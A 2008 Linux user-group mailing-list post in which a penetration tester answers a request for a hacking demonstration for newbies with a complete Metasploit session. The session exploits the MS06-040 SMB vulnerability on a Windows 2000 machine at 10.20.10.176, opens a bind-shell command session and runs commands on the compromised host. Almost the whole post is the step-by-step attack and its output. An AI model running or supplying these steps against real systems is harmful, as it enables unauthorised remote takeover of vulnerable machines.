28May2008 (UTC +8)

> > On Wednesday 28 May 2008 2:01:34 pm Louie Miranda wrote:
> > > Demonstration on how to hack a Linux system for newbies -- common remote
> > > root exploit or local root exploit.

You mean like this? :) I don't consider posting this info here as
risky because it's almost common-knowledge, and it's an old trick...
Of course, the new or custom 'sploits are confidential.
===============================================================
[EMAIL PROTECTED] msf]$
[EMAIL PROTECTED] msf]$  echo ""; uname -a; echo ""; date; echo ""

Linux ATTACKSTATION 2.6.24.4-64.fc8 #1 SMP Sat Mar 29 09:15:49 EDT
2008 x86_64 x86_64 x86_64 GNU/Linux

Wed Apr 30 23:48:50 PHT 2008

[EMAIL PROTECTED] msf]$
[EMAIL PROTECTED] msf]$ free
             total       used       free     shared    buffers     cached
Mem:       4061864    4037568      24296          0    2953512     113784
-/+ buffers/cache:     970272    3091592
Swap:      4000176         64    4000112

[EMAIL PROTECTED] msf]$
[EMAIL PROTECTED] msf]$ ./msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ msf v3.2-release
+ -- --=[ 284 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 54 aux

msf > setg RHOST 10.20.10.176
RHOST => 10.20.10.176
msf > setg TARGET 0
TARGET => 0
msf > setg PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf >
msf > use windows/smb/ms06_040_netapi

msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[EMAIL 
PROTECTED]:10.20.10.176[\BROWSER]
...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[EMAIL 
PROTECTED]:10.20.10.176[\BROWSER]
...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Command shell session 1 opened (10.80.56.225:57035 -> 10.20.10.176:4444)

msf exploit(ms06_040_netapi) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.


C:\WINNT\system32>hostname
hostname
win2000

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.20.10.176
        Subnet Mask . . . . . . . . . . . : 255.255.0.0
        Default Gateway . . . . . . . . . : 10.20.0.1

C:\WINNT\system32>
C:\WINNT\system32> exit

[*] Command shell session 1 closed.
msf exploit(ms06_040_netapi) >
msf exploit(ms06_040_netapi) > back
msf >
msf > exit
[EMAIL PROTECTED] msf]$
====================================================


Drexx Laggui  -- CISA, CISSP, CFE Associate, ISO27001 LA, CCSI, CSA
http://www.laggui.com  ( Singapore / Manila / California )
Computer forensics; Penetration testing; QMS & ISMS developers; K-Transfer
PGP fingerprint = 6E62 A089 E3EA 1B93 BFB4  8363 FFEC 3976 FF31 8A4E
_________________________________________________
Philippine Linux Users' Group (PLUG) Mailing List
http://lists.linux.org.ph/mailman/listinfo/plug
Searchable Archives: http://archives.free.net.ph

Reply via email to